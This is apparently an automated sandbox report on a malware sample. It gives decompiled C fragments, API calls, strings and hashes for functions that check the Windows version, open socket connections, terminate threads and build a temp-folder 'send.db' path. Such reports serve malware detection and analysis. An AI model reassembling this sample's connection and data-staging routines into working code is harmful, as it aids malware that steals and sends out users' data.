0x0040fbbb
0x0040fbbb
0x0040fba1
0x0040fbab
0x0040fbab
0x0040fb9f
0x0040fb67
0x0040fb6e
0x0040fb81
0x00000000
0x0040fb83
0x0040fb8d
0x0040fb8d
0x0040fb70
0x0040fb7a
0x0040fb7a
0x0040fb6e
0x00000000
0x00000000
0x00000000
0x0040fa9b
0x0040faa2
0x0040fae3
0x0040fb34
0x00000000
0x0040fb47
0x0040fb51
0x0040fb51
0x0040fae5
0x0040fae5
0x0040faed
0x0040fafd
0x0040fb0c
0x0040fb1c
0x00000000
0x0040fb22
0x0040fb2c
0x0040fb2c
0x0040fb0e
0x0040fb18
0x0040fb18
0x0040faff
0x0040fb09
0x0040fb09
0x0040faef
0x0040faf9
0x0040faf9
0x0040faed
0x0040faa4
0x0040faa4
0x0040faac
0x0040fabc
0x0040facb
0x00000000
0x0040fad1
0x0040fadb
0x0040fadb
0x0040fabe
0x0040fac8
0x0040fac8
0x0040faae
0x0040fab8
0x0040fab8
0x0040faac
0x0040faa2
0x0040fa95
0x0040fa64
0x0040fa6a
0x0040fa72
0x0040fbf8
0x0040fbfb
0x0040fa78
0x0040fa7f
0x00000000
0x0040fa7f
0x0040fa72

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040FA5A
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040FA6A

Strings

ntdll.dll, xrefs: 0040FA4B
RtlGetVersion, xrefs: 0040FA64

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: 557c9246e3e9a0fef6ff1346138e7464758c16a3ca40db203f206ff61175bc27
Instruction ID: 70fb968993985f0a901d3934b8f719e9ed9f2b91e277d5e8a0a34c20a60269a7
Opcode Fuzzy Hash: 557c9246e3e9a0fef6ff1346138e7464758c16a3ca40db203f206ff61175bc27
Instruction Fuzzy Hash: 1A414530A00128AADF348B55D8663FEB6B4AB51B4DF1044F6E645F06C1E27CDACDDE98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F33C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
networkCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040F33C(void* __ecx, short __edx) {
				char _v24;
				short _v30;
				char _v32;
				char _v2084;
				void* _t8;
				short _t9;
				char* _t12;
				void* _t18;
				void* _t19;
				short _t22;

				_t8 = 0x17;
				_t22 = __edx;
				__imp__#23(_t8, 1, 6);
				_t19 = _t8;
				_t9 = 0x17;
				_v32 = _t9;
				E0040102C( &_v24, __ecx, 0x10);
				_v30 = _t22;
				_t12 =  &_v32;
				__imp__#4(_t19, _t12, 0x1c);
				if(_t12 != 0xffffffff) {
					E00401052( &_v2084, 0, 0x802);
					_t18 = 0x17;
					__imp__InetNtopW(_t18,  &_v24,  &_v2084, 0x802);
				}
				return _t19;
			}

0x0040f34e
0x0040f350
0x0040f355
0x0040f35d
0x0040f35f
0x0040f362
0x0040f36b
0x0040f373
0x0040f377
0x0040f37e
0x0040f387
0x0040f398
0x0040f3ae
0x0040f3b0
0x0040f3b0
0x0040f3bc

APIs

socket.WS2_32(00000017,00000001,00000006), ref: 0040F355
connect.WS2_32(00000000,?,0000001C), ref: 0040F37E
InetNtopW.WS2_32(00000017,?,?,00000802), ref: 0040F3B0

Strings

<5Ik, xrefs: 0040F3B0

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InetNtopconnectsocket
String ID: <5Ik
API String ID: 2247632992-1120072674
Opcode ID: d29b1ecdb4e48be8bf2ac1a270374fef9ed7a6ee3149c8623e764551c4d5f8e9
Instruction ID: 0180e237ebb21dbc614bd4bebe7721a6296938b2e8f70b845b2fda00e0167cc6
Opcode Fuzzy Hash: d29b1ecdb4e48be8bf2ac1a270374fef9ed7a6ee3149c8623e764551c4d5f8e9
Instruction Fuzzy Hash: E401F772E00218BAE72096A19C4AFEF377CEF08720F000532F614E71C1E6B58D4487E4

Uniqueness

Uniqueness Score: -1.00%

Function 00413251, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00413251(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t35;
				void* _t37;

				_t35 = __edx;
				_t37 = __ecx;
				E00401052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t38 = _t37 + 4;
				E00403437(_t37 + 4, E004035E5( &_v8,  &_v2080));
				L00405EA5(_v8);
				_t8 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E00403679(L00403761( &_v32, _t35, _t38),  *_t8, _a4);
				E00403665( &_v32);
				return _a4;
			}

0x00413251
0x0041326b
0x0041326d
0x0041327d
0x0041328f
0x0041329b
0x004132aa
0x004132b2
0x004132ba
0x004132ba
0x004132c1
0x004132c4
0x004132cc
0x004132d7
0x004132df
0x004132ea

APIs

GetTempPathW.KERNEL32(00000400,?), ref: 0041327D
lstrcatW.KERNEL32(?,send.db), ref: 0041328F

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Strings

send.db, xrefs: 00413283
5, xrefs: 004132C4

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$DispatcherExceptionFreePathTempUserVirtuallstrcatlstrcpy
String ID: 5$send.db
API String ID: 1005844419-2022884741
Opcode ID: d8e56f645b98f6c255315b6d1be1f473f104b00fffb9f83420bb7978253f092e
Instruction ID: d648c445d5d92e18bce2bb64044d3db85d8843b1a173332005f5648c28ac963a
Opcode Fuzzy Hash: d8e56f645b98f6c255315b6d1be1f473f104b00fffb9f83420bb7978253f092e
Instruction Fuzzy Hash: 5A017C71940118ABCB10EB65DC46BEE7BBCAF50309F00807AA505B2181EB789B46CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3BD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 0040F3D9
connect.WS2_32(00000000,?,00000010), ref: 0040F3F6
InetNtopW.WS2_32(00000002,0040F029,?,00000802), ref: 0040F425

Strings

<5Ik, xrefs: 0040F425

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InetNtopconnectsocket
String ID: <5Ik
API String ID: 2247632992-1120072674
Opcode ID: d2616969f2c9092f28c7b577012a576a320f1554e3dbef7bb6aa5a5e76d146ba
Instruction ID: 1849f6337e539491ffe2d687a0a9c8bdfff1226e08de7d808908600c112c9109
Opcode Fuzzy Hash: d2616969f2c9092f28c7b577012a576a320f1554e3dbef7bb6aa5a5e76d146ba
Instruction Fuzzy Hash: 5B015A71A00208AAD710DBA59C4AEEFB7BCEF84750F504176F905E32D0EA708E4587A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4CE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040F4CE() {
				intOrPtr _v6;
				char _v288;
				struct HINSTANCE__* _t4;
				intOrPtr _t5;
				_Unknown_base(*)()* _t9;

				_v288 = 0x11c;
				_t4 = LoadLibraryA("ntdll.dll");
				if(_t4 == 0) {
					L3:
					_t5 = _v6;
					if(_t5 == 2 || _t5 == 3) {
						return 1;
					} else {
						goto L5;
					}
				} else {
					_t9 = GetProcAddress(_t4, "RtlGetVersion");
					if(_t9 == 0) {
						L5:
						return 0;
					} else {
						 *_t9( &_v288);
						goto L3;
					}
				}
			}

0x0040f4dc
0x0040f4e6
0x0040f4ee
0x0040f509
0x0040f509
0x0040f50e
0x0040f51c
0x00000000
0x00000000
0x00000000
0x0040f4f0
0x0040f4f6
0x0040f4fe
0x0040f514
0x0040f517
0x0040f500
0x0040f507
0x00000000
0x0040f507
0x0040f4fe

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040F4E6
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040F4F6

Strings

ntdll.dll, xrefs: 0040F4D7
RtlGetVersion, xrefs: 0040F4F0

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: d4db957446379958144a63c4a6f79a62c0eac4aee9f7284df379ec929f0b27f0
Instruction ID: ff8e9ccf2255d32ac1a8c1a67c9cd3443cff3f67e47653b677edfd40f96dca84
Opcode Fuzzy Hash: d4db957446379958144a63c4a6f79a62c0eac4aee9f7284df379ec929f0b27f0
Instruction Fuzzy Hash: 23E0D83078020C35CB346F756C0B7D77BA82B82749F4441B19542F16C2DB7CD94ACAE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040F51D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040F51D() {
				intOrPtr _v272;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;

				_v288 = 0x11c;
				_t5 = LoadLibraryA("ntdll.dll");
				if(_t5 == 0) {
					L3:
					if(_v272 != 2) {
						goto L5;
					} else {
						return _v284;
					}
				} else {
					_t8 = GetProcAddress(_t5, "RtlGetVersion");
					if(_t8 == 0) {
						L5:
						return 0;
					} else {
						 *_t8( &_v288);
						goto L3;
					}
				}
			}

0x0040f52b
0x0040f535
0x0040f53d
0x0040f558
0x0040f55f
0x00000000
0x0040f561
0x0040f568
0x0040f568
0x0040f53f
0x0040f545
0x0040f54d
0x0040f569
0x0040f56c
0x0040f54f
0x0040f556
0x00000000
0x0040f556
0x0040f54d

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040F535
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040F545

Strings

ntdll.dll, xrefs: 0040F526
RtlGetVersion, xrefs: 0040F53F

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: 664726f24000f005279c552ddf1a120d3a192d674360c6057643559d785a8934
Instruction ID: 2f1c81511d61838f55941c07d8fb31d28f6a249911401150564ccb1d4a38bf96
Opcode Fuzzy Hash: 664726f24000f005279c552ddf1a120d3a192d674360c6057643559d785a8934
Instruction Fuzzy Hash: 7CE0123074021C66CB34AF71AC0AAD777A85B51745F0081B5A205E25C1DA78D989CE94

Uniqueness

Uniqueness Score: -1.00%

Function 00410C36, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00410C36(intOrPtr* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t6;
				intOrPtr* _t12;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t12 = __ecx;
				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t6 != 0) {
					 *_t6( *_t12,  &_v8);
				}
				return _v8;
			}

0x00410c39
0x00410c3a
0x00410c49
0x00410c52
0x00410c5a
0x00410c62
0x00410c62
0x00410c69

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040FC6D,?,?,00402D84,?,00414648,?,?,00000000,?), ref: 00410C4B
GetProcAddress.KERNEL32(00000000), ref: 00410C52

Strings

IsWow64Process, xrefs: 00410C3F
kernel32, xrefs: 00410C44

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: a6984095b9629bf2e89983bd4f1e07a37862d1e6deb3951fbca43f367f5d7c3e
Instruction ID: aa38c12934784f8986f56b2f7d6e07c465e87370c79dbefe8b4e53ff979e27e3
Opcode Fuzzy Hash: a6984095b9629bf2e89983bd4f1e07a37862d1e6deb3951fbca43f367f5d7c3e
Instruction Fuzzy Hash: 90E08C3A640304FBDB24DBE1CC0ABCBB6ACEB44751B214159B001A2240EBB8DB408B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D17D, Relevance: 6.3, APIs: 5, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040D17D(signed int* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t23;
				void* _t33;
				struct _CRITICAL_SECTION* _t43;
				signed int* _t59;
				intOrPtr _t62;
				void* _t66;

				_t45 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				_t43 = __ecx + 0x3d8;
				EnterCriticalSection(_t43);
				_t67 = _t59[0x7b];
				_t62 = _a4;
				if(_t59[0x7b] != 0) {
					L2:
					_t69 = _t59[3];
					if(_t59[3] != 0) {
						L5:
						_t63 =  &(_t59[0xf1]);
						_t22 = E00402190( &(_t59[0xf1]), 0);
						__eflags = _t22;
						if(_t22 == 0) {
							E00401F76(_t63);
						}
						_t23 = E00402190( &(_t59[0xf3]), 0);
						__eflags = _t23;
						if(_t23 == 0) {
							E00401F76( &(_t59[0xf3]));
						}
						_v12 = _t59[4];
						_v8 = _t59[0x7c];
						E00401F4B(_t63, E0040D0A3,  &_v12);
						E00401F4B( &(_t59[0xf3]), E0040D110,  &_v12);
						 *_t59 = 1;
						LeaveCriticalSection(_t43);
						E00402190( &(_t59[0xf1]), 0xffffffff);
						E00402190( &(_t59[0xf3]), 0xffffffff);
						EnterCriticalSection(_t43);
						 *_t59 =  *_t59 & 0x00000000;
						LeaveCriticalSection(_t43);
						E0040D328(_t59);
						_t33 = 0;
						__eflags = 0;
					} else {
						E004033F5(_t66, _t62);
						if(E004057FB( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
							goto L5;
						} else {
							goto L4;
						}
					}
				} else {
					E004033F5(_t66, _t62 + 8);
					if(E004057FB( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
						L4:
						LeaveCriticalSection(_t43);
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x0040d17d
0x0040d180
0x0040d181
0x0040d185
0x0040d187
0x0040d18e
0x0040d194
0x0040d19b
0x0040d19e
0x0040d1be
0x0040d1be
0x0040d1c2
0x0040d1eb
0x0040d1eb
0x0040d1f5
0x0040d1fa
0x0040d1fc
0x0040d200
0x0040d200
0x0040d20d
0x0040d212
0x0040d214
0x0040d21c
0x0040d21c
0x0040d226
0x0040d22f
0x0040d23b
0x0040d24f
0x0040d25b
0x0040d261
0x0040d26b
0x0040d278
0x0040d27e
0x0040d284
0x0040d288
0x0040d28c
0x0040d291
0x0040d291
0x0040d1c4
0x0040d1cb
0x0040d1da
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d1da
0x0040d1a0
0x0040d1aa
0x0040d1bc
0x0040d1dc
0x0040d1dd
0x0040d1e5
0x00000000
0x00000000
0x00000000
0x0040d1bc
0x0040d297

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040D18E
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040D1DD

Part of subcall function 004033F5: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00402A97,?,?,00000000,exit,00000000,start), ref: 0040341A

Part of subcall function 004057FB: getaddrinfo.WS2_32(74B60770,00000000,00404EA0,00000000), ref: 00405848
Part of subcall function 004057FB: socket.WS2_32(00000002,00000001,00000000), ref: 0040585F
Part of subcall function 004057FB: htons.WS2_32(00000000), ref: 00405885
Part of subcall function 004057FB: freeaddrinfo.WS2_32(00000000), ref: 00405895
Part of subcall function 004057FB: connect.WS2_32(?,?,00000010), ref: 004058A1

LeaveCriticalSection.KERNEL32(?), ref: 0040D261
EnterCriticalSection.KERNEL32(?), ref: 0040D27E
LeaveCriticalSection.KERNEL32(?), ref: 0040D288

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
String ID:
API String ID: 4195813003-0
Opcode ID: 8872c8577bf3d97d6192b58af2a5c5843998f6076b4a1fc95a7fd61a9a0e64be
Instruction ID: 7a94c8fae61b2e10d6092c111b0d62f0006c67d78966a4acde4d12fd3714661c
Opcode Fuzzy Hash: 8872c8577bf3d97d6192b58af2a5c5843998f6076b4a1fc95a7fd61a9a0e64be
Instruction Fuzzy Hash: 7331B571600606BBD704EBA1CC45FEAB7ACBF18314F10413AF519B21D1EF78AA048B98

Uniqueness

Uniqueness Score: -1.00%

Function 04697AA0, Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 04697AD0
LockFileEx.KERNEL32(?,00000001,00000000,000001FE,00000000,?), ref: 04697B1B
LockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 04697BB6
GetLastError.KERNEL32 ref: 04697BC2

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: FileLock$ErrorLastVersion
String ID:
API String ID: 1561719237-0
Opcode ID: 87ebca50a350bf47ddf0e0e2b9c21043a169e4d886c9a118c057d0aa14184bca
Instruction ID: ef1fba64a7e316de7c66fb330eb7ff75ab61b0c260844372149069f87849b5e4
Opcode Fuzzy Hash: 87ebca50a350bf47ddf0e0e2b9c21043a169e4d886c9a118c057d0aa14184bca
Instruction Fuzzy Hash: 8731E471A11214CFDB25DF28DC45BEA77F8EB08715F0085A9E505DB280EB74AE84CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04697620, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,04699488), ref: 04697634
_malloc.LIBCMT ref: 0469763D

Part of subcall function 046F643B: __FF_MSGBANNER.LIBCMT ref: 046F6454
Part of subcall function 046F643B: __NMSG_WRITE.LIBCMT ref: 046F645B
Part of subcall function 046F643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,046F84E8,00000008,00000001,00000008,?,046F91C7,00000018,04709530,0000000C,046F9257), ref: 046F6480

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0469765E
_free.LIBCMT ref: 04697669

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ByteCharMultiWide$AllocateHeap_free_malloc
String ID:
API String ID: 2079281532-0
Opcode ID: 4343d281aa16b547e7c07442b7e883ec0fcf5900f3cb92145a2733030ba71eee
Instruction ID: 401290cc4c294c752b6142af5b1346064d2c7a0a32990879ca685ba2441d23a3
Opcode Fuzzy Hash: 4343d281aa16b547e7c07442b7e883ec0fcf5900f3cb92145a2733030ba71eee
Instruction Fuzzy Hash: 71F0307178633172F630356A7C06FA755488B91FB5F254225FB14AE2C0E9C46C4250AE

Uniqueness

Uniqueness Score: -1.00%

Function 046975C0, Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,74E05420,04699086,00000000,00000000,74E5F560), ref: 046975D0
_malloc.LIBCMT ref: 046975DC

Part of subcall function 046F643B: __FF_MSGBANNER.LIBCMT ref: 046F6454
Part of subcall function 046F643B: __NMSG_WRITE.LIBCMT ref: 046F645B
Part of subcall function 046F643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,046F84E8,00000008,00000001,00000008,?,046F91C7,00000018,04709530,0000000C,046F9257), ref: 046F6480

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 046975F9
_free.LIBCMT ref: 04697604

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ByteCharMultiWide$AllocateHeap_free_malloc
String ID:
API String ID: 2079281532-0
Opcode ID: 3c42121a33633525dc665e7ca21e594335e2da5c031d6250bde3ad36753de975
Instruction ID: 21f9d01eed3365088bff6ea98f8f1d36b643e645d7ca5e078d240e8236d2b016
Opcode Fuzzy Hash: 3c42121a33633525dc665e7ca21e594335e2da5c031d6250bde3ad36753de975
Instruction Fuzzy Hash: 5FF0E572B4523172F631356A7C0AFA7264CDF81BB5F210332FA14AA2C0FE94AC4240E5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA89, Relevance: 6.0, APIs: 4, Instructions: 35
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EA89(void* __ecx) {
				void* _t14;
				long _t15;
				void** _t26;
				void* _t27;

				_t27 = __ecx;
				_t26 = __ecx + 0x14;
				if( *_t26 == 0) {
					L6:
					E0040EC8C(_t27 + 0x10);
					E0040EC8C(_t27 + 4);
					E0040EC8C(_t27 + 0xc);
					_t14 = E0040EC8C(_t27 + 8);
					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
					return _t14;
				}
				_t15 = GetCurrentThreadId();
				if(_t15 ==  *(_t27 + 0x18)) {
					L5:
					E0040EC8C(_t26);
					goto L6;
				}
				if( *(_t27 + 0x10) == 0) {
					return _t15;
				}
				SetEvent( *(_t27 + 0x10));
				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
					TerminateThread( *_t26, 0xfffffffe);
				}
				goto L5;
			}

0x0040ea8a
0x0040ea8d
0x0040ea93
0x0040ead4
0x0040ead7
0x0040eadf
0x0040eae7
0x0040eaef
0x0040eaf4
0x00000000
0x0040eaf4
0x0040ea95
0x0040ea9e
0x0040eacd
0x0040eacf
0x00000000
0x0040eacf
0x0040eaa4
0x0040eafa
0x0040eafa
0x0040eaa9
0x0040eac1
0x0040eac7
0x0040eac7
0x00000000

APIs

GetCurrentThreadId.KERNEL32 ref: 0040EA95
SetEvent.KERNEL32(00000000), ref: 0040EAA9
WaitForSingleObject.KERNEL32(?,00001388), ref: 0040EAB6
TerminateThread.KERNEL32(?,000000FE), ref: 0040EAC7

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Thread$CurrentEventObjectSingleTerminateWait
String ID:
API String ID: 2174867186-0
Opcode ID: 2bcda7b74d8969f1d3be21ce305093a58f10729f55bf2d3cd7d934eaada06a5b
Instruction ID: 7c0d11aeeb9ee8d7e55f87269beabb2428f5cdeac9d462a674e1c882548833a8
Opcode Fuzzy Hash: 2bcda7b74d8969f1d3be21ce305093a58f10729f55bf2d3cd7d934eaada06a5b
Instruction Fuzzy Hash: 4E0186311046009BE734AF13E949F96B7B2BF54311F104E3EE453628E0CBB968A9CF55

Uniqueness

Uniqueness Score: -1.00%

Function 046AB410, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 312COMMON

Download Yara Rule

Strings

database corruption at line %d of [%.10s], xrefs: 046AB450, 046AB507
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046AB446, 046AB4FD

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 0-1231421067
Opcode ID: 5c0a9791eeae65fba84620c53602944613db68fc1a3cde2c83f6220f54629a7a
Instruction ID: 10c968ad5ebbcfc7256697e7dd2ce72f03935373f9bb943c95b59df7d3a0a874
Opcode Fuzzy Hash: 5c0a9791eeae65fba84620c53602944613db68fc1a3cde2c83f6220f54629a7a
Instruction Fuzzy Hash: 2BA1B171700A018BD710DF58E880A6AB3E5EF94B24F18456DEA488B351FBB1FC658FD1

Uniqueness

Uniqueness Score: -1.00%

Function 046A8E10, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

database corruption at line %d of [%.10s], xrefs: 046A9141
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A9137

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 0-1231421067
Opcode ID: 380d81e9e0d46663ffdc21c05978afb132f79fd9b518b333dbc67ca06dfe639f
Instruction ID: 5e4c91a9972ec6f6f7ef4a4fce974c1081ebd7c942f83a5f2a4d5885fc81c761
Opcode Fuzzy Hash: 380d81e9e0d46663ffdc21c05978afb132f79fd9b518b333dbc67ca06dfe639f
Instruction Fuzzy Hash: E7A169B16087429BDB14DF29C880A6BB7E5BF88744F14496DF88987340E731ED29CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0469D9B0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0469D9E7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469DB3F

Strings

}, xrefs: 0469DC31

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_memset
String ID: }
API String ID: 121741435-4239843852
Opcode ID: b5328e169eaa463028e2bc9bd4ccfef383659babad59f0e911694d04efe0e922
Instruction ID: ed58207fa29cd3e5089cc49e4dab3fc04e33ca7447ba63130970b6e54bd6383c
Opcode Fuzzy Hash: b5328e169eaa463028e2bc9bd4ccfef383659babad59f0e911694d04efe0e922
Instruction Fuzzy Hash: 03A12BB5A002059FDF14CF95C480AAEB7F9FF98314F248569E949AB304E7B1BD52CB90

Uniqueness

Uniqueness Score: -1.00%

Function 046A58C0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 224COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A5A5A

Strings

database corruption at line %d of [%.10s], xrefs: 046A5980, 046A5A6E
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A5976, 046A5A64

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 2102423945-1231421067
Opcode ID: dadf87a00e407a28435f90188e29265d8b64fb0951d330364e4b04dd4e1dc27a
Instruction ID: 31ac00f5652532d6a562fd0646c38e330b2c797a96edf8191947de4d1697ba3f
Opcode Fuzzy Hash: dadf87a00e407a28435f90188e29265d8b64fb0951d330364e4b04dd4e1dc27a
Instruction Fuzzy Hash: FA71FFB1701B11ABDB20DF18C880A66B3A5AF84764F084569FA5A8B341F770FC65CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 046A3A90, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A3AB2

Strings

database corruption at line %d of [%.10s], xrefs: 046A3B11, 046A3B36, 046A3CB7
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A3B07, 046A3B2C, 046A3CAD

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 2102423945-1231421067
Opcode ID: d5717c94a3dc73d2af61309ad88914a12c8894aa97d31880787835eb2d8aa153
Instruction ID: 68e3b40a45f8e765b585c8fd5303f1459a68fc48bbbf09ba416b622ca6c36e04
Opcode Fuzzy Hash: d5717c94a3dc73d2af61309ad88914a12c8894aa97d31880787835eb2d8aa153
Instruction Fuzzy Hash: F5617E61604B915BC3298F3C88A0575FFE29F91109B4885DDEDDB8B383E166FA54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0469C4D0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 182COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0469C598
